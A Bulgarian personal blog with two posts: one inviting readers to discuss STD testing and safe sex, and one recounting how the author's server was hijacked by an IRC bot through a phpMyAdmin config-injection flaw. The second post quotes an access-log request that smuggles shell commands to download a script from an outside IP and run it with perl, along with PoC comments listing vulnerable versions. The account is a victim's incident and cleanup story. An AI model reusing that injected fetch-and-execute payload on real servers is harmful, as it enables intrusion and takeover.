Lucifer's sandbox

Една случка около Нова година, ме накара да се замисля за няколко въпроса:

Колко от нас (включително и мен) си правят редовни и профилактични тестове за STD (Sexually Transmitted Diseases)?

Колко от нас практикуват безопасен секс?

Колко от нас са наясно с нещата?

Случката, като цяло не е интересна … интересно е какво ме накара да направя. За да не задълбавам, ще съкратя нещата: помолиха ме да се изследвам за STD.

По принцип, на времето, когато имах по-див и освободен сексуален живот, го правих редовно – на всеки 6 месеца се ходеше в ХЕИ във Варна, взимаха ми кръв и ми правиха тест … това се беше превърнало в навик …

По стечение на обстоятелствата, последния ми тест е от малко повече от 6 месеца. Просто така се стекоха нещата, а и имаше един период в живота ми в който … ами да кажем, че няма по хубаво от 1/2 TB порно … и загубих този хубав мой навик.

От събота ровя за да намеря къде в София правят такива тестове … Най-накрая намерих. Позвъних и ми казаха, че могат да ми направят само за HIV. Еми и това е добро като за начало – все пак през последните 6-8 месеца не съм се отдавала много много на “желанията” си. На кратко ми направиха теста … не че през 5-те минути които отне на реактивите да взаимодействат не се побърках то страх … но това си е друг въпрос….

Спокойно. Оказа се Отрицателен – имам си бележка на която пише HIV NEGATIVE. Вярно, че след седмица – две ще се наложи да ходя пак, за да видя дали са получили и другите тестове, но …

Не ме разбирайте погрешно – не пиша тази тема за да кажа резултата от изследванията (дори аз не съм такъв). Пиша за да ви задам въпросите по-горе. Но нека се опитам да ги формулирам по кратко и ясно:

1. Правили ли сте си тестове за STD? Ако да – то колко често и по каква причина? Ако не – по каква причина?

2. Практикувате ли безопасен секс и какво разбирате под “безопасен секс”? Защо?

3. До колко разчитате на партньора ви да ви пази? Защо?

4. Знаете ли за безплатните тестове? Възползвате ли се от тях?

Странна тема от мен нали? Не съм едно от най-социално загрижените животни наоколо, но по някаква причина липсата на сексуална култура в хората ме хвърля почти толкова в шок, колкото и ограниченото мислене …

Ваш,

Lucifer

Искам да се оплача … от собствената си глупост … и то много да се оплача …

То бива бива да съм заблуден, ама като мене не бива. Ситуацията на кратко – сървъра ми беше хакнат! Дап, моето мило Анаваро!

Беше заразен с IRC бот вирус. Нямаше много “мрежеви” поражения … защото машината слаба или аз съм я сложил калпаво, та вируса само се изпълняваше, вдигаше CPU-то на 100% и системата умираше – няма мрежа, няма нищо, а аз знаете съм на 500 км.

След няколко рестарт-а и любимите ми “tail -f” и “htop” успях да засека следния малък проблем:

ID    USER    NI  CPU%  MEM%   VIRT    SHR   S  TIME+     Command
3813  apache  0   65.0    0.1       1776   432    R   1:42.64   ./std 89.137.139.225 0

А … ново 20??? Какъв пък процес се изпълнява от apache (Web Server-a) …

Спомних си кога за първи път се появи проблема и се зарових из логовете на индианеца … където открих следния “смахнат” ред:

88.191.14.38 - - [29/Nov/2009:02:12:10 +0200] "GET /phpMyAdmin/config/config.inc.php?c=cd%20/tmp;wget%20http://88.170.72.136/gcc.txt;lwp-download%20http://88.170.72.136/gcc.txt;fetch%20http://88.170.72.136/gcc.txt;perl%20gcc.txt;rm%20-fr%20gcc.txt HTTP/1.1" 200 181

Изненадкааа …Разбира се разпищях се из Linux-bg и ми върнаха лошата за мен новина:

# PoC script successfully tested on the following targets:

# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1

# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)

# attack requirements:

# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5

# and 3.x before 3.1.3.1 according to PMASA-2009-3

# 2) it *seems* this vuln can only be exploited against environments

# where the administrator has chosen to install phpMyAdmin following

# the *wizard* method, rather than manual method: http://snipurl.com/jhjxx

# 3) administrator must have NOT deleted the ‘/config/’ directory
# within the ‘/phpMyAdmin/’ directory. this is because this directory is
# where ‘/scripts/setup.php’ tries to create ‘config.inc.php’ which is where
# our evil PHP code is injected

Бах! Как се саморазпосувах, само може да си представите! Правих какви ли не магарии – то не бяха преинсталации на apache, промени на пътеки …

Отново и отново ./std $IP $PORT процеса ме убиваше …

Питайки чичко Гугъл … случайно стигнах до един сайт в който някой се оплакваше от моя проблем.

ps aux | grep apache

ми даде виновника – индианеца се беше троянизирал … изпълняваше процеси (добре че е deamon) …

crontab -u apache -e

ми даде и проблема – някакво фаилче кръстено y2kupdate в /tmp/.pid/ и изпълнимо … на бързо му бих “rm -r”, премахнах референцията в cron-а и изтрих phpMyAdmin-a (сложих си го на скрито място) …

Знам, че съм пълен идиот … ама аз съм си такъв …

Ваш,

Lucifer